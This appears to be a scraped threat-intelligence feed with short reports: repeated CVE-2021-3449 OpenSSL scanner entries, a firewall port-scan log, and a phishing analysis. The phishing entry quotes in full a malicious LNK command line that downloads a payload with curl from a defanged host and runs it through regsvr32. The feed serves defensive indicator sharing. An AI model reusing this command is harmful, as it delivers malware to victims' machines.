SSL OpenSSL X509_V_FLAG_X509_STRICT and signature_algorithms Vulnerabilities (CVE-2021-3449)
censys ...
show moreSSL OpenSSL X509_V_FLAG_X509_STRICT and signature_algorithms Vulnerabilities (CVE-2021-3449)
censys-scanner.com
show less
SSL OpenSSL X509_V_FLAG_X509_STRICT and signature_algorithms Vulnerabilities (CVE-2021-3449)
cens ...
show moreSSL OpenSSL X509_V_FLAG_X509_STRICT and signature_algorithms Vulnerabilities (CVE-2021-3449)
censys-scanner.com
show less
o Phishing email provides link to webhosted zip file and password for zip file called Documm52188256 ...
show moreo Phishing email provides link to webhosted zip file and password for zip file called Documm52188256.zip
o It contains Analize752.lnk (sic) [The number changes]
This file contains this command:
Process "cmd.exe" with commandline "/q /c echo 'r_m' && MD "%LOCALAPPDATA%\QM" && echo "cW" && curl.exe -o %LOCALAPPDATA%\QM\zLy_m.Oi.Jv https://gesam[.]com[.]bo/qVx/1.png && regsvr32 "%LOCALAPPDATA%\QM\zLy_m.Oi.Jv" && ping OPO[.]com && ping rG02[.]com"
o When ran it creates a directory called QM in “C:\Users\[redacted]\AppData\Local\
This contains a portable executable called zLy_m.Oi.Jv that it tries to execute with a regsvr32 proxy.
10-24-2022
show less
Port scan of large number of ports over 5 different destination IPs.
2022-11-26 05:13:13 FWDeny, D ...
show morePort scan of large number of ports over 5 different destination IPs.
2022-11-26 05:13:13 FWDeny, Denied, pri=4, disp=Deny, src_ip=176.111.174.136, src_port=48436
show less